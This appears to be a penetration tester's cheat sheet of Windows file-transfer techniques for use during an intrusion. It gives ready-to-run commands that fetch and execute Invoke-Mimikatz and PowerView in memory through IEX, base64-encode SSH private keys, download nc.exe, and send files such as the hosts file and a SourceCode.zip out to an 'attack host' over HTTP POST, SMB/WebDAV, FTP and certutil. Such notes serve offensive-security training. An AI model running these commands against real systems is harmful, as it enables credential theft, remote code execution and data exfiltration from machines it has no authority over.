Windows

POWERSHELL

Base64 Encode & Decode Lin -> Win

1. Check SSH Key MD5 Hash

md5sum id_rsa

1. Encode SSH Key to Base64

cat id_rsa | base64 -w 0;echo

justimaginethisissomerandomhashbecauseyoudontcareandidontcare=

1. Decoding SSH Key on Windows machine

PS C:\> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("justimaginethisissomerandomhashbecauseyoudontcareandidontcare="))

1. Confirming the MD5 Hashes Match

Get-FileHash C:\Users\Public\id_rsa -Algorithm md5

• Note: It's not always possible to use this method because cmd.exe has a maximum string length of 8191 characters. And also web shell may error because of this large strings.

Base64 Encode & Decode Win -> Lin

I explained above how to do encoding in Linux and decoding in Powershell, now I'll explain opposite: Encode in Powershell and decode in Linux

1. Encode File Using Powershell

# If you don't need to copy file to Clipboard, just delete that pipe
PS C:\> [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Tools\2025_BloodHound.zip")) | Set-Clipboard
# Get hash

1. Decode Base64 String in Linux

echo justimaginethisissomerandomhashbecauseyoudontcareandidontcare= | base64 -d > 2025_BloodHound.zip
# Or if you encoded file into clipboard, just paste output into file, and decode
base64 -d bhoutput.txt > BH_GRAPH.zip

1. Get & Check Hash

PS C:\> Get-FileHash "C:\Tools\2025_BloodHound.zip" -Algorithm MD5 | select Hash 

$ md5sum 2025_BloodHound.zip

Web Downloads

In any version of PowerShell, the System.Net.WebClient class can be used to download a file over HTTP, HTTPS or FTP. The following table describes WebClient methods for downloading data from a resource.

1. File Download

#Syntax: (New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1','C:\Users\Public\Downloads\PowerView.ps1')

#Syntax: (New-Object Net.WebClient).DownloadFileAsync('<Target File URL>','<Output File Name>')
PS C:\> (New-Object Net.WebClient).DownloadFileAsync('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1', 'PowerViewAsync.ps1')

PS C:\> Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1

PS C:\> powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"

1. PowerShell DownloadString - Fileless Method. Fileless attacks work by using some operationg system functions to download the payload and execute it directly. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or the alias IEX

PS C:\> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')

Common Errors

• Internet Explorer Error

PS C:\> Invoke-WebRequest https://<ip>/PowerView.ps1 | IEX

Invoke-WebRequest : The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.
At line:1 char:1
+ Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/P ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotImplemented: (:) [Invoke-WebRequest], NotSupportedException
+ FullyQualifiedErrorId : WebCmdletIEDomNotSupportedException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand

PS C:\carnifex17> Invoke-WebRequest https://<ip>/PowerView.ps1 -UseBasicParsing | IEX

• SSL/TLS Untrusted certificate error

PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

PowerShell Web Uploads

PowerShell doesn't have a built-in upload fucntions, so we need to use Invoke-WebRequest. or Invoke-RestMethod. Also we can use uploadserver module for Python, to install it we should use:

pip3 install uploadserver

• Turn On Web Server with Upload

python3 -m uploadserver

1. PowerShell Script to Upload a File to Python Upload Server

PS C:\> IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
PS C:\> Invoke-FileUpload -Uri http://13.13.13.13:8000/upload -File C:\Windows\System32\drivers\etc\hosts

1. PowerShell Base64 Web Upload. Convert file to base64 and send it using Invoke-WebRequest with POST method.

PS C:\> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\> Invoke-WebRequest -Uri http://13.13.13.13:8000/ -Method POST -Body $b64

nc -lvnp 8000

echo <base64> | base64 -d -w 0 > hosts

SMB

Downloads

1. Create the SMB Server

sudo impacket-smbserver share -smb2support /tmp/smbshare

1. Copy a File from the SMB Server

C:\> copy \\192.168.220.133\share\nc.exe

• But in some scenarios there would be an error, which forbids us unauthentificated guest access, so we could creat a smb server with authentification

1. Create the SMB Server with a Username and Password

sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test

1. Mount the SMB Server with Username and Password

C:\> net use n: \\192.168.220.133\share /user:test test

Uploads

SMB Uploads will be more tricky because companies usually block uploads to SMB, cause it could cause a huge problem. BUUUT we could use HTTP or HTTPS protocol in return. It's because when you use SMB, it will first attempt to connect using SMB protocol, and if there's no SMB share available, it'll try to connect using HTTP. But for this we need WebDav protocol, it enables a webserver to behave like a fileserver, which we need. First you need to install it

sudo pip install wsgidav cheroot

1. Using the WebDav Python module

sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous

1. Connecting to the Webdav Share. DavWWWRoot isn't a folder, it's a special keyword that tells WebDAV that we are connection to the root of WebDav server. You could use any existing directory when you are connecting, as example sharefolder

C:\> dir \\13.13.13.13\DavWWWRoot

1. Uploading Files using SMB

C:\> copy C:\Users\john\Desktop\SourceCode.zip \\13.13.13.13\DavWWWRoot\
C:\> copy C:\Users\john\Desktop\SourceCode.zip \\13.13.13.13\sharefolder\

FTP

Downloads

• Installing FTP Server python3 module

sudo pip3 install pyftpdlib

1. Setting up a Python3 FTP Server

sudo python3 -m pyftpdlib --port 21

1. Transferring Files from an FTP Server Using Powershell

PS C:\> (New-Object Net.WebClient).DownloadFile('ftp://13.13.13.13/file.txt', 'C:\Users\Public\ftp-file.txt')

1. Create a Command File for the FTP Client and Download the Target File

C:\> echo open 13.13.13.13 > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo GET file.txt >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open 13.13.13.13
Log in with USER and PASS first.
ftp> USER anonymous

ftp> GET file.txt
ftp> bye

C:\> more file.txt
This is a test file

Uploads

For this we would also use peftpdlib but we need to specify the option --write to allow clients to upload files to our attack host.

1. Starting FTP Server

sudo python3 -m pyftpdlib --port 21 --write

1. Powershell Upload File

PS C:\> (New-Object Net.WebClient).UploadFile('ftp://13.13.13.13/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

1. Create a Command File for the FTP Client to Upload a File

C:\> echo open 13.13.13.13 > ftpcommand.txt
C:\> echo USER anonymous >> ftpcommand.txt
C:\> echo binary >> ftpcommand.txt
C:\> echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt
C:\> echo bye >> ftpcommand.txt
C:\> ftp -v -n -s:ftpcommand.txt
ftp> open 13.13.13.13

Log in with USER and PASS first.


ftp> USER anonymous
ftp> PUT c:\windows\system32\drivers\etc\hosts
ftp> bye

CERTUTIL

File Transfer

PS C:\> certutil.exe -urlcache -split -f http://13.13.13.13:1337/youknowim.bat youknowim.bat

File Encode

C:\> certutil -encode file1 encodedfile

File Decode

C:\> certutil -decode encodedfile file2